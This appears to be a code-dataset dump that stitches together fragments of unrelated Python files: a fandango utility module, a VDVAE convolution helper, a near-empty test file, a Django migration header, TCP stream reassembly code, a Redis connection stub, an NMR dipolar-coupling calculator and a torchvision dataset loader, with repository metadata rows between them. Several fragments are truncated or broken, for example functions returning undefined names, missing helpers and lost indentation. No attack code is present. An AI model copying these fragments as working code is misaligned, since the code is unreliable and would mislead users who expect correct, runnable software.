fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def copy(obj):
"""
This method will return a copy for a python primitive object.
It will not work for class objects unless they implement the
__init__(other) constructor
"""
if hasattr(obj,'copy'):
o = obj.copy()
else:
try:
o = type(obj)(other=obj)
except:
o = type(obj)(obj)
return o
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
"""
Converts a python object to a dictionary with all its members
as python primitives
This can be used in Queues or to convert to str using pickle.dumps
:param fltr: a callable(name):bool method
"""
dct = {}
try:
for name in dir(obj):
if fltr and not fltr(name):
continue
try:
attr = getattr(obj,name)
if hasattr(attr,'__call__'): continue
if name == 'inited_class_list': continue
if name.startswith('__'): continue
if type_check:
try:
if type(attr).__name__ not in dir(__builtin__):
if isinstance(attr,dict):
attr = dict((k,v) for k,v in attr.items())
else:
attr = str(attr)
except:
continue
dct[name] = attr
except Exception,e:
print(e)
if class_check:
klass = obj.__class__
if '__class__' not in dct:
dct['__class__'] = klass.__name__
if '__bases__' not in dct:
dct['__bases__'] = [b.__name__ for b in klass.__bases__]
if '__base__' not in dct:
dct['__base__'] = klass.__base__.__name__
except Exception,e:
print(e)
return(dct)
## Useful class objects
def make_property(var,fget=_fget,fset=_fset,fdel=_fdel):
""" This Class is in Beta, not fully implemented yet"""
return property(partial(fget,var=var),partial(fset,var=var),
partial(fdel,var=var),doc='%s property'%var)
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
#return '_%s'self.name
def NamedProperty(name,fget=None,fset=None,fdel=None):#,doc=None):
"""
This Class is in Beta, not fully implemented yet
It makes easier to declare name independent property's (descriptors) by
using template methods like:
def fget(self,var): # var is the identifier of the variable
return getattr(self,var)
def fset(self,value,var): # var is the identifier of the variable
setattr(self,var,value)
def fdel(self,var): # var is the identifier of the variable
delattr(self,var)
MyObject.X = Property(fget,fset,fdel,'X')
"""
return property(partial(fget,var=name) if fget else None,
partial(fset,var=name) if fset else None,
partial(fdel,var=name) if fdel else None,doc=name)
import threading
__lock__ = threading.RLock()
def locked(f,*args,**kwargs):
"""
decorator for secure-locked functions
A key-argument _lock can be used to use a custom Lock object
"""
_lock = kwargs.pop('_lock',__lock__)
try:
_lock.acquire()
return f(*args,**kwargs)
except Exception,e:
print 'Exception in%s(*%s,**%s): %s' % (f.__name__,args,kwargs,e)
finally:
_lock.release()
def self_locked(func,reentrant=True):
''' Decorator to make thread-safe class members
@deprecated
@note see in tau.core.utils.containers
Decorator to create thread-safe objects.
reentrant: CRITICAL:
With Lock() this decorator should not be used to decorate nested
functions; it will cause Deadlock!
With RLock this problem is avoided ... but you should rely more
on python threading.
'''
#lock_fun.__name__ = func.__name__
#lock_fun.__doc__ = func.__doc__
return lock_fun
###############################################################################
def NewClass(classname,classparent=None,classdict=None):
"""
Creates a new class on demand:
ReleaseNumber = NewClass('ReleaseNumber',tuple,
{'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))})
"""
if classparent and not isSequence(classparent):
classparent = (classparent,)
return type(classname,classparent or (object,),classdict or {})
###############################################################################
###############################################################################
###############################################################################
def decorator_with_args(decorator):
'''
Decorator with Arguments must be used with parenthesis: @decorated()
, even when arguments are not used!!!
This method gets an d(f,args,kwargs) decorator and returns a new
single-argument decorator that embeds the new call inside.
But, this decorator disturbed stdout!!!!
There are some issues when calling nested decorators; it is clearly
better to use Decorator classes instead.
'''
# decorator_with_args = lambda decorator: \
# lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
return lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
###########################################################################
## @DEPRECATED!
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967 | 89 | 0.56135 |
0b42ef18819891116ae94c7d2436b4f0dab7c2b9 | 5,877 | py | Python | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 DeepMind Technologies Limited and the Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Building blocks for VDVAE."""
from typing import Optional, Tuple
import chex
from flax import linen as nn
import jax
_NUM_CONV_LAYER_PER_BLOCK = 4
def get_vdvae_convolution(output_channels,
kernel_shape,
weights_scale = 1.,
name = None,
precision = None):
"""Builds a 2D convolution.
Args:
output_channels: number of output channels.
kernel_shape: shape of convolutional kernel.
weights_scale: scale of initial weights in the convolution.
name: name of the module.
precision: jax precision.
Returns:
a nn.Conv2D.
"""
kernel_init = nn.initializers.variance_scaling(
scale=weights_scale, mode='fan_in', distribution='truncated_normal')
return nn.Conv(
features=output_channels,
kernel_size=kernel_shape,
strides=(1, 1),
padding='SAME',
use_bias=True,
kernel_init=kernel_init,
name=name,
precision=precision)
| 35.618182 | 82 | 0.650842 |
0b43e92ff65dfbae4bcf1fe66e16f6008f379b22 | 2,605 | py | Python | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | null | null | null | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | 2 | 2018-10-20T22:16:56.000Z | 2018-10-25T23:56:43.000Z | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | null | null | null | import pytest
import json
import numpy as np
| 26.05 | 69 | 0.621881 |
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3 | 1,068 | py | Python | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 4 | 2018-03-12T23:49:01.000Z | 2020-07-06T17:37:29.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 259 | 2018-02-06T07:53:07.000Z | 2020-06-05T19:18:32.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 22 | 2018-01-25T14:02:05.000Z | 2020-06-24T20:37:01.000Z | # Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
| 38.142857 | 258 | 0.634831 |
0b4772665a5a43688e79771eafbcfa9e4db57a1a | 6,661 | py | Python | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | import re
from abc import ABCMeta, abstractmethod
from datetime import datetime
from typing import Callable, Iterator
from apache_beam.io import iobase
from apache_beam.io.range_trackers import (LexicographicKeyRangeTracker,
OffsetRangeTracker,
UnsplittableRangeTracker)
from dateutil.relativedelta import relativedelta
class DateSplitter(BaseSplitter):
"""Split bounded source by dates."""
pass
class IdsSplitter(BaseSplitter):
"""Split bounded source by any ids."""
def _validate_query(self):
condensed_query = self.source.query.lower().replace(" ", "")
if re.search(r"notin\({ids}\)", condensed_query):
raise ValueError(f"Not support 'not in' phrase: {self.source.query}")
if not re.search(r"in\({ids}\)", condensed_query):
example = "SELECT * FROM tests WHERE id IN ({ids})"
raise ValueError(f"Require 'in' phrase and 'ids' key on query: {self.source.query}, e.g. '{example}'")
| 37.632768 | 118 | 0.664465 |
0b479dbf807c903d09638149ff0de16acee169e3 | 5,827 | py | Python | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
| 34.276471 | 104 | 0.763686 |
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8 | 1,163 | py | Python | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | import numpy as np
##
## @brief function_description
##
## @param filename The filename
##
## @return description_of_the_return_value
##
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return description_of_the_return_value
##
| 23.26 | 71 | 0.674119 |
0b49a43a85fb689276b933c981268752b4780e5f | 3,255 | py | Python | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | import numpy as np
import cv2 as cv
import os
import shutil
from skimage.util.shape import view_as_windows
import torch.nn.functional as F
import torch
from functools import lru_cache
| 31.601942 | 112 | 0.663902 |
0b4a7fb8ebee09432022b77e8750863d12e69e9f | 134 | py | Python | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | s = input().strip()
res = [c for c in set(s.lower()) if c.isalpha()]
if len(res) == 26:
print("pangram")
else:
print("not pangram")
| 19.142857 | 48 | 0.604478 |
0b4ac3436bf4854bb94f737d096d1fe630a754a3 | 8,423 | py | Python | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | 5 | 2017-07-31T02:07:05.000Z | 2021-02-14T16:39:49.000Z | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | null | null | null | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | 4 | 2016-07-24T08:56:54.000Z | 2020-07-12T11:50:02.000Z | from __future__ import print_function
import pkgutil
import stream_decoders
# this module decodes stream based protocols.
# and resolves retransmissions.
decoders= []
# __path__ is used to find the location of all decoder submodules
for impimp, name, ii in pkgutil.iter_modules(stream_decoders.__path__):
impload= impimp.find_module(name)
decoders.append(impload.load_module(name).toplevel)
import math
import time
import struct
# handle with packet reordering
def reorder(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
# if any(len(x) for x in self.seqmap.values()):
# print(self.seqmap)
# save all pkts in seqmap
if not src in self.seqmap:
self.seqmap[src]= {}
self.seqmap[src][ctx.tcp.seq]= ctx
# then try to process pkts
for k in sorted(self.seqmap[src].keys()):
ctx= self.seqmap[src][k]
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
# gap -> output later
# todo: on FIN: do forward gapped data to protocol.handler.
##print("gap %d" % (ctx.tcp.seq-self.cur[src]))
break
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
##print("retransmitted %d" % skip)
# todo: detect server/client direction
# client: SYN has ctx.tcp.ack==0
# server: SYN has ctx.tcp.ack!=0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x %08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f))
if skip < len(ctx.tcp.payload):
# todo: pass server/client flag + source/dest ports
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
self.cur[src] = endseq
del self.seqmap[src][k]
class StreamManager:
| 32.396154 | 93 | 0.544343 |
0b4afb977af41e7750f169c98501350be4fa6ae6 | 247 | py | Python | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | null | null | null | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | 3 | 2020-09-16T13:30:17.000Z | 2020-09-19T09:56:50.000Z | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | null | null | null | import logging
import aioredis
from app.core.config import REDIS_DSN, REDIS_PASSWORD
logger = logging.getLogger(__name__)
| 22.454545 | 92 | 0.805668 |
0b4cc6aa957df616a9c14313fa9b9ee7ec6d0837 | 1,434 | py | Python | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | from math import pi
u0 = 4.*pi*1E-7 # T m /A
hbar = 1.0545718E-34 # J s
# 1 T = kg s^-2 A-1 = J A^-1 m^-2
g = {
'1H' : 267.513E6, # rad T^-1 s^-1
'13C': 67.262E6,
'15N': -27.116E6,
'e': 176086E6
}
# nuc_i, nuc_j: nucleus string. ex: '1H'
# r_ij: distance in Angstroms
DCC = lambda nuc_i, nuc_j, r_ij: -1.*(u0*g[nuc_i]*g[nuc_j]*hbar)/(4.*pi*(r_ij*1E-10)**3)
print('-'*30)
print('1H-15N (1.02A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.02)/(2.*pi), 'Hz'))
print('1H-15N (1.04A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.04)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-13C (1.1A): {:> 8.1f} Hz'.format(DCC('1H','13C', 1.1)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-1H (1.00A): {:> 8.1f} Hz'.format(DCC('1H','1H', 1.0)/(2.*pi), 'Hz'))
print('1H-1H (2.4A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.4)/(2.*pi), 'Hz'))
print('1H-1H (2.8A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.8)/(2.*pi), 'Hz'))
print('-'*30)
print('13C-13C (1.53A): {:> 8.1f} Hz'.format(DCC('13C','13C', 1.53)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-e (1A): {:> 8.1f} MHz'.format(DCC('1H','e', 1.0)/(1E6*2.*pi), 'Hz'))
print('1H-e (5A): {:> 8.1f} kHz'.format(DCC('1H','e', 5.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (10A): {:> 8.1f} kHz'.format(DCC('1H','e', 10.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (50A): {:> 8.1f} kHz'.format(DCC('1H','e', 50.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (100A): {:> 8.1f} Hz'.format(DCC('1H','e', 100.0)/(2.*pi), 'Hz'))
print('-'*30)
| 34.142857 | 89 | 0.502092 |
0b4dc3067343c33e32c44d539a787edba0c40515 | 2,197 | py | Python | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | 1 | 2022-03-31T02:37:35.000Z | 2022-03-31T02:37:35.000Z | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | null | null | null | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | null | null | null | import pathlib
from typing import Any, Dict, List, Tuple
from torchdata.datapipes.iter import IterDataPipe, Mapper, Filter
from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource
from torchvision.prototype.datasets.utils._internal import path_comparator, hint_sharding, hint_shuffling
from torchvision.prototype.features import EncodedImage, Label
| 38.54386 | 114 | 0.65817 |